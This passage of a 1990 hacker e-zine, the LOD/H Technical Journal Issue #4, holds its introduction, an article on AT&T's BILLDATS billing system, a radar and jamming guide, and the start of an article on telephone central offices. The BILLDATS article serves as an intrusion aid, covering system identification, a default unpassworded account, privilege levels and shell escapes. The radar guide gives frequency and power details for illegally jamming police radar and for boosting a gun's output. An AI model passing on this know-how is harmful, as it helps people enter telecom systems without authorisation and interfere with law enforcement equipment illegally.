The LOD/H Technical Journal, Issue #4: File 01 of 10

The LOD/H Technical Journal, Issue #4: File 01 of 10
Finally Released: May 20, 1990

THE

LOD/H TECHNICAL JOURNAL

INTRODUCTION
-------------

We are still alive. This publication is not released on any schedule. Past
attempts at scheduling issues have failed miserably. The editors refuse to
release issues which are not up to our self-defined standards. We have in the
past, and will continue in the future, to accept articles from anyone (e.g.
non LOD) as long as the articles adhere to our basic format and style. The
editors review all articles to verify accuracy and integrity however it may
not be possible in all cases to check every fact. Plagiarized material is not
acceptable and we make every attempt to verify an article's originality. When
referenced material is used, the source for that material must be clearly
stated. The more articles we receive the sooner each issue is released. There
is a minimum 2 month review and editing period for each article. If you want
to contribute articles contact any member and they will forward articles to
the editors.

There seems to be some confusion as to what writers are (or were) in LOD/H and
what ones aren't. JUST BECAUSE SOMEONE WRITES FOR THIS PUBLICATION DOES NOT
MEAN THEY ARE AN LOD/H MEMBER! Just to clear up any confusion, a current
member list follows:

Lord Havok
Lex Luthor
Prime Suspect
Phase Jitter
Professor Falken
Skinny Puppy

File 06: The History of LOD/H is a short article explaining the origin of the
group. We realize this is of interest to only a few, and most people probably
could care less. However, also included is a list of EVERY member who was ever
in the group. This is to clear up any and all misconceptions about members.
The press, telecommunications and computer security people, law enforcement,
and others can finally get their facts straight [See Issue #3, article 10,
Clearing up the mythical LOD/H Busts for a prime example, and also in the
Network News and Notes section -- first two articles regarding more so called
'LOD BUSTS']. Another purpose is to thwart would-be group impostors. SYSOPS
who give system access to individuals solely because they are a member of some
respected group are urged to verify the hacker's identity as best they can. No
one should be taken on their word alone.

This issue is dedicated to the three (now "retired") members who recently
received visits from our friends and yours, the U.S. Secret Service and
Bell South Security: The Leftist, The Urvile, and The Prophet. Again, see
the Network News and Notes section for the stories.
Although the TJ is distributed to many boards, the inability for any decent
board to consistently remain online prevents us from utilizing "sponsor"
boards as distribution hubs. Therefore, the TJ will be distributed to whatever
boards are around at the time of release. Due to the lack of boards the
newsletter will be distributed in diskette form to those who can help in its
distribution.

___________________________________________________________________________

TABLE OF CONTENTS

Name of article or file Author Size
-----------------------------------------------------------------------------
01 Introduction to the LOD/H Technical Journal Staff 04K
and Table Of Contents for Issue #4

02 The AT&T BILLDATS Collector System Rogue Fed 14K

03 The RADAR Guidebook Professor Falken 17K

04 Central Office Operations Agent Steal 32K

05 A Hackers Guide to UUCP The Mentor 27K

06 The History Of LOD/H Lex Luthor 12K

07 The Trasher's Handbook to BMOSS Spherical Abberation 11K

08 The LOD/H Telenet Directory Update #4 Part A Lord Havok 65K

09 The LOD/H Telenet Directory Update #4 Part B Lord Havok 43K

10 Network News and Notes Staff 38K

Total: 7 Articles 10 Files 263K

____________________________________________________________________________

End Of Intro/TOC
Issue #4
The LOD/H Technical Journal, Issue #4: File 02 of 10

The AT&T BILLDATS Collector
Written by:
Rogue Fed

==============================================================================

NOTES: This article will hopefully give you a better understanding of how
the billing process occurs. BILLDATS is just one part of the billing picture.
Before I began working for the government, I was a Telco employee and thus,
the information within this article has been learned through experience.
Unfortunately, I was only employed for a few months (including training on
BILLDATS) and am still learning more about the many systems that a telco uses.
There are however, a couple of lists that were compiled and slightly modified
from what little reference material I could smuggle out and my notes from the
training class. This article does require a cursory knowledge of telco and
computer operations (ie. switching, SCCS, UNIX).

INTRODUCTION -
==============

BILLDATS - BILLing DATa System

BILLDATS can be explained in a nutshell by the acronym listed above. If it's
one thing telecommunications providers do well, it's creating acronyms.
Basically, BILLDATS collects billing information (that's why they call it a
Collector) from AMATs (Automatic Message Accounting Transmitters). The AMATs
are situated in or close to switching offices and are connected to BILLDATS
either through dedicated or dial-up lines. BILLDATS can be considered as
the "middleman" in the billing process. The system collects, validates, and
adds identification information regarding origination and destination. This
is then transferred to tape (or transmitted directly) to the RPC (Regional
Processing Center) or the RAO (Revenue Accounting Office). The RPC/RAO
actually processes the billing information. Typically the BILLDATS system is
located in the same or adjoining building (but can be across town) to
the RPC/RAO.

BILLDATS is similar to many other phone company systems (ie. SCCS) as it uses
a combination of software. The software base is UNIX and the BILLDATS Generic
program runs on it. The hardware used is an AT&T 3B20 (this is what 5ESS
switches use).

Some of the more interesting features BILLDATS possesses are:

* Can be accessed via dialup (always a plus).
* Runs under UNIX (another plus).
* Interface with SCCS (yet another plus).
* Can store about 12 million calls for the first two disks and about
8 million calls for each additional disk. A total of 6 (675 MB) disks
can be used.
* Inserts the sensor type and ID and recording office type and ID onto
every AMA record that it collects.
* Capable of collecting information from nearly 600 AMATs.

To better understand how/why you get a bill after making long distance phone
calls, I have delineated the steps involved.

You call Hacker X and tell him all about the latest busts that have occurred,
he exclaims "Oh Shit!" hangs up on you and throws all his hacking information
into the fireplace. The actual call is referred to as a call event. As each
event happens (upon termination of the call) the event is recorded by the
switch. This information is then sent via an AMA Transmitter which formats the
information and then sends it to BILLDATS (commonly called a "Host
Collector"). BILLDATS then provides the information to the RAO/RPC. The
billing computer is located at the RAO/RPC. Do not confuse the actual billing
system with BILLDATS! The billing computer:

* Contains customer records
* Credit ratings (in some telcos)
* Totals and prints the bill
* Generates messages when customers do not pay (ie. last chance and
temporary termination of service)

When the billing period is over, (typically 25-30 days), many events (it
depends on how many calls you have made) have accumulated. A bill is then
generated and mailed to you.

COLLECTION -
============

BILLDATS collects information in two ways:

1. AMATs
2. Users

AMAT input
----------

BILLDATS collects data from the AMAT either directly from the switch, or from
a front end which performs some processing on the data before giving it to
BILLDATS. The data I am talking about here is usually AMA billing information.
The information is in the usual AMA format (see Phantom Phreaker's article in
the LOD/H Technical Journal, Issue #3 on AMA for formats and other info). As
I said earlier, the recording office and sensor types and IDs have to be
added by BILLDATS. The other information that is transmitted is usually
maintenance data.

The data that is transferred between BILLDATS and an AMAT is accomplished
over either dedicated or dialup lines using the BX.25 protocol. This protocol
has been adopted by the telecommunications industry as a whole. It is
basically a modified version of X.25.

User input
----------

This is simply sysadmin and sysop information.

INSERTED INFORMATION -
======================

Once the information is collected, additional data (mentioned earlier)
must be inserted. The information that BILLDATS inserts into the AMA records
it receives depends on whether the AMAT is a single or multi-switch AMAT.
Either way, the data is passed through the DEP. The DEP is a module which
is part of the LHS (Link Handler Subsystem) that actually inserts the
additional data. It also performs other functions which are rather
uninteresting to the hacker. The LHS manages the x-mission of all the
collected information. This is either through dedicated or dialup lines. The
LHS is responsible for:

* Logging of statistics as related to the performance of links.
* Polling of remote switches for maintenance and billing information.
* Passing information to the DEP in which additional information is
inserted.
* Storing billing information.
* Other boring stuff.

AMATS -
=======

Basically an AMAT is a front end to the switch. The AMAT:

* Gets AMA information from the switch.
* Formats and processes the information.
* Transmits it to BILLDATS.
* An AMAT can also store information for up to 1 week.

The following is a list of switches and their related AMAT equipment that
BILLDATS obtains billing information from:

1A ESS: This is usually connected to a 3B APS (Attached Processor System) or
BILLDATS AMAT.
2ESS: This is connected to an IBM Series 1 AMAT.
2BESS: Connected to a BILLDATS AMAT.
4ESS: Connects to 3B APS.
5ESS: Direct connection.
TSPS 3B:Direct connection.
DMS-10: Connects to IBM Series 1 AMAT.

There are other AMATs/Switches but they must be compatible with the BILLDATS
interface.

ACCESSING BILLDATS -
====================

Even though a system is UNIX based, that doesn't mean that it is a piece of
cake to get into. Surprisingly (when you think about the average Intelligence
Quotient of telco personnel) but not surprisingly (when you consider that the
information contained on the system is BILLING information--the life blood of
the phone company) BILLDATS is a little more secure than your average telco
system, except for the fact the all login IDs are 5 lower case characters or
less. BILLDATS can usually be identified by:

bcxxxx 3bunix SV_R2+

where:

bc = B(ILLDATS) C(ollector).
xxxx = The node suffix. This is entered when the current Generic is installed.
3bunix = This simply indicates that UNIX is running on an AT&T 3Bxx system.
SV_R2+ = Software Version.

The good news is that there is a default username when the system is
installed. The bad news is that upon logon, the system forces you to choose a
password. The default username is not passworded initially. The added security
feature is simply that the system forces all usernames to have passwords. If
it doesn't have an associated password, the system will give you the message:

"Your password has expired. Choose a new one"

A 6-8 character password must then be entered. After this you will be asked
to enter the terminal type. The ones provided are AT&T terminals (615, 4425,
and 5420 models). Once entered a welcome message will probably be displayed:

"Welcome to the South Western Bell BILLDATS Collector"
"Generic 3, Issue 1"
"Tuesday 01 Aug 1989 12:44:44 PM"

dallas>

The BILLDATS prompt was displayed "dallas>" where dallas is the node name.

There are 3 privilege levels within BILLDATS:

1. Administrator
2. Operator
3. UUCP

* Administrator privs are basically root privs.
* An account with Operator privs can still do about anything an Admin can do
except make data base changes.
* UUCP privs are the lowest and allow file transfer.

Commands
--------

Just like SCCS, UNIX commands can be entered while using BILLDATS. The format
is:

dallas>run-unx:$unix cmd;

All unix commands must be preceded by "run-unx:" and end with a semicolon ";".
The semicolon is the command terminator character (just like Carriage Return).

BILLDATS isn't exactly user friendly, but it does have on-line help. There are
a number of ways that it can be obtained:

dallas> help-?; or help-??; or ?-help; or ??-help;

If you want specific help:

dallas> help-(command name);

I can list commands forever, but between UNIX (commands every hacker should
be familiar with) and help (any moron can use it), you can figure out which
ones are important.

Error Messages
--------------

Just like SCCS, BILLDATS has some rather cryptic error messages. There are
thousands of error messages, once you know a little about the format they
are easier to understand. When a mistake is made, something similar to
the following will appear:

UI0029 (attempted command) is not a valid input string.

^ ^- error message information
|
|-- This is the subsystem and error message number

The following is a brief description of subsystem abbreviations:

BD: BILLDATS system utilities. Errors associated with the use of utility
programs will be displayed.
DB: Data Base manager. These messages are generated when accessing or
attempting to access the various Data Bases (explained later) within
BILLDATS.
DM: Disk Manager. Basically, information pertaining to the system disk(s).
EA: Error and Alarm. As the name implies, system errors and alarms.
LH: Link Handler. Messages related to data link activity, either between
BILLDATS and the AMAT or BILLDATS and the RAO/RPC.
SC: Scheduler. The scheduler is BILLDATS' version of the UNIX cron daemon.
BILLDATS uses cron to schedule things like when to access remote systems.
TW: Tape Writer. Messages related to storing billing information on tapes
which will then be transported to the RAO/RPC.
UI: User Interface. This was used in the above example. Displays syntax,
range or status errors when entering commands.
DL: Direct Link. Instead of BILLDATS information being written to tape, a
direct link to the RPC/RAO mainframe (the actual billing system computer)
can be accomplished. This is usually done when BILLDATS is located far
away from the RPC/RAO office as there is always some risk involved in
transporting tapes, and that risk increases the farther away the two
offices are. Another neat thing about Direct Link is that the billing data
can be sent across a LAN (Local Area Network) also. Obviously this incurs
some concerns regarding security, but from what I have heard and seen,
AT&T and the BOC's typically choose to ignore the security of their
systems which suits me just fine. The Direct Link is an optional BILLDATS
feature and if it is in use, messages related to its operation are
displayed with the DL prefix.

BILLDATS DATA BASES -
=====================

The databases contain all kinds of useful information such as usernames,
switch types, scheduled polling times, etc.

The AMAT Data Base contains:

* Type of switch
* Sensor type and identification
* AMAT phone number
* Channel and port number/group
* Other boring information

The Port Data Base contains:

* Communications information (like L-Dialers on UNIX Sys. V)
* Channel and port information
* Other boring information

The Collector Data Base contains:

* Collector office ID
* Version number of the Data Base
* Number and speed of any remote terminals
* When reports are scheduled for output
* Other boring information

CONCLUSION -
============

If you are not technically oriented, I hope this article helped you understand
how you get your bill. I assumed that you would skip over the commands for
using BILLDATS and similar information.

If you are technically oriented, I hope I not only helped you understand more
about the billing process, but also increased your awareness of how detailed
the whole process is. And if you do happen to stumble onto a BILLDATS system,
you have been pointed in the right direction as far as using it correctly is
concerned.

I tried to leave out all the boring details, but some may have slipped by me.
I reserved the right to omit specific details and instructions regarding any
alteration or deletion of calls/charges for my own use/abuse.

The Rogue Federal Agent

[ End Of Article ]

The LOD/H Technical Journal, Issue #4: File 03 of 10

The Radar Guidebook
by
Professor Falken

-----------------------------------------------------------------------------

Anyone who has driven a car without a radar detector before, has gotten
that paranoid feeling that the cops are around radaring. This feeling is not
a nice one; it is the feeling that somewhere somehow someone is watching you.
In this article I will attempt to explain how radar guns work, what bands
the guns work on, why they are wrong 70% of the time, how to employ stealth
technology in defeating the radar, and last but not least jamming the radar.

RADAR stands for RAdio Detecting And Ranging. A speed-radar gun works
under the Doppler theory. This theory is that when a signal is reflected off
an object moving toward you, the signal will be at a higher frequency than the
initial frequency, this increase in frequency is used to calculate speed.
Many of you have experienced the Doppler effect, which occurs when a noise
from a siren increases in strength (gets louder) as it approaches and
decreases in strength (gets softer) as it moves away from you.

Right now in the United States, there are three bands that are Federal
Communication Commission (FCC) certified for "field disturbance sensors",
known to you and me as radar guns. These bands have proper non-technical
names, and all operate in the GigaHertz range. GigaHertz is a measure of
frequency; one GHz equals one billion cycles per second. Most frequency
modulation (FM) radio broadcasts are made in the 0.088 GHz to 0.108 GHz band,
in MegaHertz that is 88 MHz to 108 MHz. The three proper names for these
radar bands are: X, K, and Ka.

One of the older radar bands is the X band. X band radar is the most
commonly used radar band in the United States. X band radar transmits its
signal at 10.5250 GHz. The wattage of the radar's signal really depends upon
the gun manufacturer. However, most manufacturers agree that a 100 milliwatt
signal is "High-Power" and the 40 milliwatt range is "Low Power". The gun's
range also depends upon the manufacturer. The average maximum range of a X
band gun is 2500 feet. That estimate is based on the assumption that the gun
is operating at full-strength (100mw). Most radar detectors give off a
false signals on this band due to ultrasonic motion detectors employed
by various burglar alarm systems. Large grocery stores also use these to
open the doors magically as you walk in or out.

Another older band is K band. K band operates on 24.150 GHz and is not as
popular as X band, but it is gaining in usage throughout the country. The
normal signal strength of K band guns again depends upon the manufacturer,
but the ones I've seen all operate at 100 milliwatts at high-power. These
guns have a maximum range of 3000 feet, assuming they are at 100mw signal
strength.

A new type of radar has been introduced and assigned a frequency by the
Federal Communications Commission. This new band has been assigned the name
Ka and has been designated a frequency of 34.360 GHz. Current Ka technology
gives the gun a maximum effective range of 40 to 200 feet. This band
was originally made for use with photo-radar. The photo-radar can be set up
on a tripod on the side of the road or in the back of a police car. The
user then triggers a button when he wants a car in the guns range
clocked, automatically taking a picture of the car & license plate.
At the time the photograph is taken a date and time is imprinted on the
picture. The police keep one duplicate for archival purposes and sends the
other to the registered owner of the car along with ticket information and the
amount due. This type of system can only work in places that hold the owner
of a vehicle responsible for any violations that occur with the car. The
legal barriers for photo radar to overcome are extensive, most notably, not
giving the vehicle owner due process and the presumption of guilt. There is
a system out now for $19.95 that defeats Ka band photo radar. I expect it to
be illegal VERY QUICKLY once Ka is more widely used. This little baby slips
over your license plate and acts as venetian blinds. When looking straight at
the plate it looks like a normal plate with a black frame. However when
looking at it from a Ka band Photo Radar's angle it looks like a license plate
with a silver streak covering the whole plate, making it impossible to
identify. This device is called the Photobuster and is available from
most radar detector specialty stores.

There are two different types of radar guns. They are Instant-On/Pulse and
Constant Broadcasting Radar. The names are self-explanatory, but I will
explain them anyway. The constant broadcast radar continually transmits
its radar signal, and anything in its path will be clocked. Instant-On &
Pulse radars are basically identical, and are both very deadly since they are
harder to detect as a threat. The Instant-On gun is really nothing more than
an ON/OFF switch for signal transmission. In order to have a pulse gun, all
a cop has to do is purchase one with a "HOLD" feature or just turn the gun
on when he/she wishes to use it. The "HOLD" feature is simply a button that
keeps the gun on but makes sure no signal is being transmitted. No one can
detect a gun that is off or in "HOLD" mode. An officer using an Instant-On
radar gun will periodically check the speed of the traffic. These samplings
can easily be detected and will give the user of a detector prior warning to
a Instant On/Pulse activated radar gun.

Many detectors on the market today provide anti-falsing circuitry. Falsing
is the triggering of the radar detector from something other than a radar gun.

One or two detector manufactures make their detectors with GaAs diodes.
GaAs diodes are Gallium Arsenide diodes which are a military grade electrical
component that helps produce a good signal-to-noise ratio.

All new model radar detectors use Superheterodyne technology.
Superheterodyne, also known as active technology, amplifies all incoming
signals hundreds of times, which makes it more sensitive and selective as to
which signals will trigger an alert. Superheterodyne technology also gives
out a minute internal radar signal of its own, which can be picked up by older
(Pre/Early 1980's) non-anti-falsing radar detectors. If you have a newer
model radar detector, this small internally generated signal is no problem to
your's or anyone's anti-falsing radar detecting unit. NOTE: In states
where radar detectors are illegal (Ex. Virginia, Canada) the police have
devices which detect this Superheterodyne signal. Police can then stop
you and confiscate your detector. Getting around this police tactic
would be to use an early radar detector without Heterodyne/Superheterodyne
detection technology.

Many compact/shirt pocket radar units are "exclusively made with SMD's".
These SMD's are Surface Mounted Devices and contain extremely small resistors,
transistors, diodes, and capacitors. Just because a manufacturer uses SMD's,
that does NOT make the unit any better than a larger detector of the same age.

Cincinnati Microwave Inc., the makers of Escort and Passport say they have
the exclusive technology for the detection and anti-falsing of RASHID VRSS
technology. RASHID VRSS is actually the Rashid Radar Safety Brake Collision
Warning System. It is an electronic device that operates on K band
frequencies and warns heavy trucks and ambulances of hazards in their path.
About 900 RASHID VRSS units have been prototyped in three states. Since the
number of actual operating RASHID units is so minute, I really doubt you will
run into one.

There are two ways a radar gun can produce an incorrect speed reading.
These are known as the Cosine Error and Moving Radar Error. The Cosine Error
occurs when a radar gun gives a lower reading than the actual speed of the
target. This occurs because the gun can only measure the doppler shift that
occurs directly towards or away from the antenna. If the object moves at an
angle to the gun, the shift will be lower than if it moves directly at the
antenna. Therefore the reading the radar gun gives will be less than the
actual speed of the object. The radar reading can be calculated by taking
the Actual Speed times the cosine of the incidence angle. So if the target
car's actual speed is 50 miles per hour and it is 37 degrees off of the
mainline radar signal, the radar speed will be 40 miles per hour. Look:

Cosine Error Theory:
Actual Speed x Cosine of Incidence Angle = Radar's Shown Speed

Cosine of 37 degrees is 0.80
50 MPH x 0.80 = 40 MPH

So if you see a radar enabled cop coming head-on towards you it would be a
good idea to get into the right hand lane, or further if possible, as this
increases the angle and thus lowers your radar speed. The other error is the
Moving Radar Error, which occurs only when a police car is using a moving
radar gun. A false reading is obtained by the unit because before it
can radar you it must radar something along side the road to get the patrol
car's speed. Most often, billboards and parked cars are used for this initial
patrol car speed calibration. It is susceptible to errors because of the
Cosine Error, mentioned above. Once the patrol car has its speed (wrong or
not), it assumes that the target's (YOU) speed is the difference between the
highest oncoming signal and the patrol speed; but if the patrol speed is lower
it will ADD that error on to the target speed. So the target speed (YOU) will
read higher than you were actually traveling. Here's the theory and a
problem:

Moving Radar Theory:
Closing Speed - Patrol Speed = Target Speed

The ACTUAL speeds for these are:
Patrol Car Speed - 60 MPH
Target Car Speed - 60 MPH
Closing Speed - 120 MPH

Due to the Cosine Error the TARGET CAR's speed will cause the gun to
calculate a LOW reading for the actual patrol car's speed due to the cosine
error.

The RADAR calculated speeds are:
Patrol Car Speed - 50 MPH
Target Car Speed - 70 MPH
Closing Speed - 120 MPH

Thus you can see how the police car is going to get an incorrect reading.
This is a good one to memorize and bring into court for any tickets.

It's been recently brought to my attention that there are stealth-bras for
cars. From what I understand, the bras actually absorb the radar, and reflect
such a weakened signal that the radar gun cannot detect it. I have not seen
one of these in person, but from what I have heard they are made out of a VERY
DENSE rubber/metal composite. The bra probably traps the signal very much
like the F-117/B-2 stealth aircraft do. The material is probably made up of
hexagonal shaped cells, the back of the cell being at a slight angle, so that
any signal coming into the cell will have to bounce around within the cell
before exiting it. The inside of each cell is filled with a radar absorbing
material. As the signal hits the back of the hexagonal cell it is bounced
around inside the cell through the absorbing material, weakening the signal
each time it does so. Upon leaving the cell, the signal is so weak the
radar's receiver may not pick up the signal until the target is near enough
to give a positive return on the radar screen. When the aircraft is getting
closer, within radar range, the signal reflected may be so small the radar's
controller may think he is picking up ground interference, a flock of birds
or possibly bad weather. The actual radar absorbing material is classified at
this time by the government. The actual composite on the car bra is certainly
not as good as the actual radar absorption material of the aircraft, but I'm
sure it is somewhat similar.

Radar jamming is done very much the way any other type of radio jamming is
done. You simply overpower the frequency being used with a frequency of your
own. Radar jamming/overpowering is ILLEGAL in the United States. To jam a
signal all you need is a transmitter, an amplifier and an antenna. To jam a
gun using a K band radar (24.150 GHz) all you do is get a transmitter that can
transmit in the 20 GHz range and a 10-100 watt amplifier and antenna. Send
out a signal at around 24.05 GHz. This signal will make the cop's radar
either show a 0 or an incredibly slow speed such as -520. Usually the
cop's radar cannot show a negative sign, so it will just be 520. This
10-100 watt signal that you are transmitting will overpower the signal
his/her radar sent out and is waiting to receive. His/her gun is only at
100 milliwatts, and you're transmitting at 10-100 watts; its like using a
12-gauge shotgun against a rodent.

Where can you get microwave transmission equipment? You can check local
electronic shops, satellite stores, Cable TV companies and local television
stations as to where they buy their microwave transmission gear. Or you can
buy a radar gun of your own, and leave it ON whenever your driving. This will
give the cop's gun a very strange reading, most likely zero. If it is
possible, once you have the gun bring it to a "corrupt" electronics shop and
have it modified for high powered transmission, preferably in the 10 to 100
watt range.

Some radar guns have resistors implemented just before the antenna, but
just after the amplifier for de-amplification of the transmitter's signal.
This means that most guns already have a good (1 watt or so) transmit
capacity, but it is suppressed to bring the actual transmit signal to the
100mw area. The owner of the gun only has to know which resistors to take
out, then he/she will have a functional high powered gun. If this small
wattage does not satisfy you, you may have to purchase a separate amplifier
for the gun, and have it wired directly into the radar's transmitter antenna.
This modification is expensive not to mention illegal, but then again what the
hell isn't these days. I have seen six different types of guns offered from
National Radar Exchange. The following are a few major radar gun
manufacturers that are sold out of most radar shops. They are:

KUSTOM SIGNAL:
Kustom Signal HR-12 K Band 100mw signal 2000-3000 foot maximum range $695.00
Kustom Signal HR-8 K Band 100mw signal 1800-3000 foot maximum range $495.00

CMI INC.:
Speedgun One X Band 100mw signal 1000-2500 foot maximum range $395.00
Speedgun Six X Band 100mw signal 1000-2500 foot maximum range $495.00
(Since these units are the same, the only differences are things like
last speed reading recall, 10 number memory, etc.)

MPH INC.:

MPH K-55 X Band 40mw signal 1200-2500 foot maximum range $495.00
(Can clock target in 1/2 second, which is exceptionally fast for radar guns)

The only differences between the models are their bands and their options,
such as a "HOLD" button, last speed recorded etc.

I have found these to be some of the top units in the radar detector world
currently and are listed as follows:

MOST SENSITIVE MOST FEATURES BEST LOOKING MOST RELIABLE SMALLEST
-------------- ------------- ------------ ------------- -------------
COBRA 4120 COBRA 4120 Whistler 3SE ESCORT Uniden RD-9XL
BEL 944 COBRA 3160 BELL 944 K40 Whistler 3SE
Snooper 6000 BELL 944 Uniden RD-9XL

BEST VALUE LOUDEST BEST FILTERED
------------ -------------- ------------------
Snooper 4000 COBRA 5110 Snooper 6000
Cobra 5110 COBRA 3120 Other Snoopers
Cobra 3168 Whistler Q2002
Maxon RD25

I did not get to see Cincinnati Microwave's new "SOLO", nor BEL's
"Vector 3", "Express", nor it's newer "Legend 3."

Just because a detector is the MOST sensitive doesn't mean it is the best
detector. Because of the sensitivity you could pick up more alarms. What
you want is a detector with excellent sensitivity, but good anti-falsing
circuitry.

I hope this article has given you some insight on how radars work and
how their tickets CAN be defeated. Keep safe and sane,

Professor Falken
Legion Of Doom

<EOF>
The LOD/H Technical Journal, Issue #4: File 04 of 10

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$ $
$ Central Office Operations $
$ Western Electric 1ESS,1AESS, $
$ The end office network environment $
$ $
$ Written by Agent Steal 1989 $
$ $
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Topics covered in this article will be:

Call tracing
RCMAC
Input/output messages
SCC and SCCS
COSMOS and LMOS
BLV, (REMOB) and "No test trunks"
Recent change messages
Equal Access

Did I get your attention? Good, everyone should read this. With the time,
effort, and balls it has taken me compile this knowledge it is certainly worth
your time. I hope you appreciate me taking the time to write this.

I should point out that the information in this article is correct to the
best of my knowledge. I'm sure there are going to be people that disagree
with me on some of it, particularly the references to tracing. However, I
have been involved in telecommunications and computers for 12+ years.

I'm basing this article around the 1AESS since it is the most common
switch in use today.

** OUTSIDE PLANT **

This is the wiring between your telephone and the central office. That is
another topic in itself. If you are interested read Phucked Agent 04's article
on The Outside Loop Distribution Plant (OLDP) in the LOD/H Technical Journal,
Issue #1. The article explains those green boxes you see on street corners,
aerial cables, manholes etc. So where that article stops, this one starts.

** CABLE VAULT **

All of the cables from other offices and from subscribers enter the
central office underground. They enter into a room called the cable vault.
This is a room generally in the basement located at one end or another of the
building. The width of the room varies but runs the entire length of the
building. Outside cables appear through holes in the wall. The cables then run
up through holes in the ceiling to the frame room.

Understand that each of these cables consist of an average of 3600 pairs
of wires. That's 3600 telephone lines. The amount of cables obviously depends
on the size of the office. All cables (e.g. interoffice, local lines, fiber
optic, coaxial) enter through the cable vault.

** FRAME ROOM **

The frame is where the cable separates into individual pairs and attach
to connectors. The frame runs the length of the building, from floor to
ceiling. There are two sides to the frame, the horizontal side and the
vertical side. The vertical side is where the outside wiring attaches and the
protector fuses reside. The horizontal side is where the connectors to the
switching system reside. Multi-conductor cables run from the connectors to
actual switching equipment. So what we have is a large frame called the Main
Distribution Frame (MDF) running the entire length of the building. From floor
to ceiling it is 5 feet thick. The MDF consists of two sides, the VDF and the
HDF. Cables from outside connect on one side and cables from the switching
equipment connect to the other side and jumper wires connect the two. This way
any piece of equipment can be connected to any incoming "cable pair". These
jumper wires are simply 2 conductor twisted pair, running between the VDF and
the HDF.

What does all this mean? Well if you had access to COSMOS you would see
information regarding cable and pair and "OE" (Office Equipment). With this
information you could find your line on the frame and on the switch. The VDF
side is clearly marked by cable and pair at the top of the frame, however the
HDF side is a little more complicated and varies in format from frame to frame
and from switch to switch. Since I am writing this article around the 1AESS,
I will describe the OE format used for that switch.

OE ABB-CDD-EFF

Where..

A = Control Group (when more than one switch exists in that C.O.)
B = LN Line Link Network
C = LS Line Switching Frame
D = CONC or CONCentrator
E = Switch (individual, not the big one)
F = Level

There is one more frame designation called LOC or LOCation. This gives the
location of the connector block on the HDF side. Very simply, looking at the
frame:

H ---------------------------------------------------------------------

G ---------------------------------------------------------------------

F ---------------------------------------------------------------------

E ---------------------------------------------------------------------

D ---------------------------------------------------------------------

C ---------------------------------------------------------------------

B ---------------------------------------------------------------------

A ---------------------------------------------------------------------

123456789 etc.

Please note that what you are looking at here represents the HDF side of
the MDF, being up to 100 feet long, and 20 feet high. Each "-" represents a
connector block containing connections for 4 x 24 (which is 96) pairs.

So far I've covered how the wires get from you to the switching
equipment. Now we get to the switching system itself.

** SWITCHING SYSTEMS **

Writing an article that covers them all would be lengthy indeed. So I am
only going to list the major ones and a brief description of each.

- Step by Step
Strowger 1889
First automatic, required no operators for local calls
No custom calling or touch tone
Manufactured by many different companies in different versions
Hard wire routing instructions, could not choose an alternate route if
programed route was busy
Each dial pulse tripped a "stepper" type relay to find its path

- No.1 Crossbar 1930
- No.5 Crossbar 1947 (faster, more capacity)
Western Electric
First ability to find idle trunks for call routing
No custom calling, or equal access
Utilized 10x20 cross point relay switches
Hard wired common control logic for program control
Also copied by other manufactures

- No.4 Crossbar
Used as a toll switch for AT&T's long lines network
4 wire tandem switching
Not usually used for local loop switching

- No.1ESS 1966
- No.1AESS 1973
Western Electric
Described in detail later

- No.1EAX
GTE Automatic Electric
GTE's version of the 1AESS
Slower and louder

- No.2ESS 1967
- No.2BESS 1974
Western Electric
Analog switching under digital control
Very similar to the No.1ESS and No.1AESS
Downsized for smaller applications

_ No.3ESS
Western Electric
Analog switching under digital control
Even smaller version of No.1AESS
Rural applications for up to 4500 lines

- No.2EAX
GTE Automatic Electric
Smaller version of 1EAX
Analog switch under digital control

- No.4ESS
Western Electric
Toll switch, 4 wire tandem
Digital switching
Uses the 1AESS processor

- No.3EAX
Gee is there a pattern here? No GTE
Digital Toll switch
4 wire tandem switching

- No.5ESS
AT&T Network Systems
Full scale computerized digital switching
ISDN compatibility
Utilizes time sharing technology
Toll or end office

- DMS 100 Digital Matrix Switch
Northern Telecom
Similar to 5ESS
Runs slower
Considerably less expensive

- DMS 200
Toll and Access Tandem
Optional operator services

- DMS 250
Toll switch designed for common carriers

- DMS 300
Toll switch for international gateways

- No.5EAX
GTE Automatic Electric
Same as above

How much does a switch cost? A fully equipped 5ESS for a 40,000
subscriber end office can cost well over 3 million dollars. Now you know why
your phone bill is so much. Well...maybe you parents bill.

** The 1ESS and 1AESS **

This was the first switch of it's type put into widespread use by Bell.
Primarily an analog switch under digital control, the switch is no longer
being manufactured. The 1ESS has been replaced by the 5ESS and other full
scale digital switches, however, it is still by far the most common switch
used in today's Class 5 end offices.

The #1 and 1A use a crosspoint matrix similar to the X-bar. The primary
switch used in the matrix is the ferreed (remreed in the 1A). It is a two
state magnetic alloy switch. It is basically a magnetic switch that does not
require voltage to stay in it's present position. A voltage is only required
to change the state of the switch.

The No. 1 utilized a computer style, common control and memory. Memory
used by the #1 changed with technology, but most have been upgraded to RAM.
Line scanners monitor the status of customer lines, crosspoint switches,
and all internal, outgoing, and incoming trunks, reporting their status to
the central control. The central control then either calls upon program or
call store memories to chose which crosspoints to activate for processing the
call. The crosspoint matrices are controlled via central pulse distributors
which in turn are controlled by the central control via data buses. All of
the scanner's AMA tape controllers, pulse distro, x-point matrix, etc., listen
to data buses for their address and command or report their information on
the buses. The buses are merely cables connecting the different units to the
central control.

The 1E was quickly replaced by the 1A due to advances in technology. So
1A's are more common, also many of the 1E's have been upgraded to a 1A.
This meant changing the ferreed to the remreed relay, adding additional
peripheral component controllers (to free up central controller load) and
implementation of the 1A processor. The 1A processor replaced older style
electronics with integrated circuits. Both switches operate similarly.
The primary differences were speed and capacity. The #1ESS could process
110,000 calls per hour and serve 128,000 lines.

Most of the major common control elements are either fully or partially
duplicated to ensure reliability. Systems run simultaneously and are checked
against each other for errors. When a problem occurs the system will double
check, reroute, or switch over to auxiliary to continue system operation.
Alarms are also reported to the maintenance console and are in turn printed
out on a printer near the control console.

Operation of the switch is done through the Master Control Center (MCC)
panel and/or a terminal. Remote operation is also done through input/output
channels. These channels have different functions and therefore receive
different types of output messages and have different abilities as for what
type of commands they are allowed to issue. Here is a list of the commonly
used TTY channels.

Maintenance - Primary channel for testing, enable, disable etc.
Recent Change - Changes in class of service, calling features etc.
Administrative - Traffic information and control
Supplementary - Traffic information supplied to automatic network control
SCC Maint. - Switching Control Center interface
Plant Serv.Cent.- Reports testing information to test facilities

At the end of this article you will find a list of the most frequently
